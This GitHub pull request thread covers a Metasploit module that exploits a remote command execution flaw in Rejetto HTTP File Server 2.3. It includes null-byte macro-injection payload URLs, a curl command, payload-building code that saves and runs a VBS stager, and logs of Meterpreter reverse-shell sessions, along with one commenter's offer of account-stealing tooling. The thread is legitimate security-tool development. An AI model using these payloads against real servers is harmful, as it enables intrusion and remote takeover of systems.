Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Http File Server Remote Command Exec #3793

Merged
merged 10 commits into from Oct 8, 2014
Merged

Http File Server Remote Command Exec #3793

merged 10 commits into from Oct 8, 2014

Conversation

mfadzilr
Copy link
Contributor

Add "http_file_server_exec" remote exploitation module

Remote command execution bypass macro filters, using "%00" to bypass filters, 'save' and 'exec' macro command to create vbs file dan execute the vbs script on the target system. please note that when using "exec", it will execute 4 x times.

Notes

Tested on target host without antivirus installed.

Example Output

msf exploit(http_file_server_exec) > exploit
[] Exploit running as background job.
msf exploit(http_file_server_exec) >
[
] Started reverse handler on 192.168.175.142:4444
[] Using URL: http://0.0.0.0:8080/791wKD
[
] Local IP: http://192.168.175.142:8080/791wKD
[] Server started.
[
] Sending a malicious request to /
[] 192.168.175.134 http_file_server_exec - 192.168.175.134:80 - Payload request received: /791wKD
[
] Sending stage (769536 bytes) to 192.168.175.134
[] Meterpreter session 5 opened (192.168.175.142:4444 -> 192.168.175.134:1335) at 2014-09-20 18:05:48 +0800
[+] Deleted c:\test\VtdVFRGk.vbs
[
] Server stopped.

msf exploit(http_file_server_exec) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > shell
Process 2072 created.
Channel 2 created.
Microsoft Windows XP Version 5.1.2600 Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\pentest\Desktop>

@mfadzilr mfadzilr closed this Sep 15, 2014
@mfadzilr mfadzilr reopened this Sep 15, 2014
@mubix
Copy link
Contributor

mubix commented Sep 15, 2014

Awesome module, only problem is that it pops up a ton of wscript/cmd screens on the target. Is there any reason you went for a wget-like approach to the module instead of just piping the encoded VBS over directly?

@mubix
Copy link
Contributor

mubix commented Sep 15, 2014

Here is another fun option: http://hfsserver/?search=test%00\{.add%20folder|real|C:\\|Cdrive.\}"

@mubix
Copy link
Contributor

mubix commented Sep 15, 2014

Did notice that when trying to use the 'append' operand, it would write the string 4 times to the file specified using the following: $ curl "http://hfsserver/?search=test%00\{.append|C:\\temp\\bob.txt|blah.\}"


payloads = [
"save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Change this line to:
"exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}"
And there won't be any more popups during execution (no need to start cmd.exe especially if you use the filename and extension)

@mfadzilr
Copy link
Contributor Author

works perfectly, thanks mubix

@mubix
Copy link
Contributor

mubix commented Sep 15, 2014

Made some updates to push a file instead of puling it: https://gist.github.com/mubix/b855d8045a6112a937a7 it's REALLY ugly, don't use it as gospel, but just another option.

'uri' => '/'
})

if res.headers['Server'] =~ /HFS 2.3/
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The correct regex should be:

/HFS 2\.3/

@wchen-r7
Copy link
Contributor

The CmdStager approach would be the most appropriate implementation.

@mubix
Copy link
Contributor

mubix commented Sep 15, 2014

@wchen-r7 can't use the standard CmdStager because it issues every command 4 times and the greater-than seems like a bad character. (I haven't tried &lt yet)

@wchen-r7
Copy link
Contributor

@mubix No, I mean your approach is correct.

@mfadzilr
Copy link
Contributor Author

i tried the cmdstager option, i seem can't make it less noisy as popups flying over the screen. the code is here https://gist.github.com/mfadzilr/6b8fbc3ce9ee89623585, most of it taken from mubix approach.

@ghost
Copy link

ghost commented Oct 6, 2014

Hi i'm the author of this vulnerability if you need i can provide you my framework with full features like disable log , steal user account , and many more :) , contact me on gmail danielelinguaglossa@gmail.com

@jvazquez-r7
Copy link
Contributor

Since it has been quiet for some days, and looks like there was new commits trying to address feedback I'm going to pick up it! If someone working on it, or interested on it, please warn here! :) Verification in progress in the meanwhile!

@jvazquez-r7 jvazquez-r7 self-assigned this Oct 8, 2014
@jvazquez-r7 jvazquez-r7 merged commit a2a2ca5 into rapid7:master Oct 8, 2014
jvazquez-r7 added a commit that referenced this pull request Oct 8, 2014
@jvazquez-r7
Copy link
Contributor

Landed after some clean up, see final result here: 411f6c8

Test:

msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) >  > rhost 172.16.158.131
rhost => 172.16.158.131
msf exploit(rejetto_hfs_exec) > check
[*] 172.16.158.131:80 - The target service is running, but could not be validated.
msf exploit(rejetto_hfs_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Using URL: http://0.0.0.0:8080/ioMapl7dz
[*]  Local IP: http://10.6.0.90:8080/ioMapl7dz
[*] Server started.
[*] Sending a malicious request to /
[*] 172.16.158.131   rejetto_hfs_exec - 172.16.158.131:80 - Payload request received: /ioMapl7dz
[*] Sending stage (769536 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:1152) at 2014-10-08 12:12:53 -0500
[+] Deleted %TEMP%\ODdmpVxzusEV.vbs
[*] Server stopped.

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit

Thanks @mfadzilr for the module, awesome work!

@mfadzilr
Copy link
Contributor Author

mfadzilr commented Oct 8, 2014

great news, thank you very much

@mfadzilr mfadzilr deleted the http_file_server_module branch October 9, 2014 10:02
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants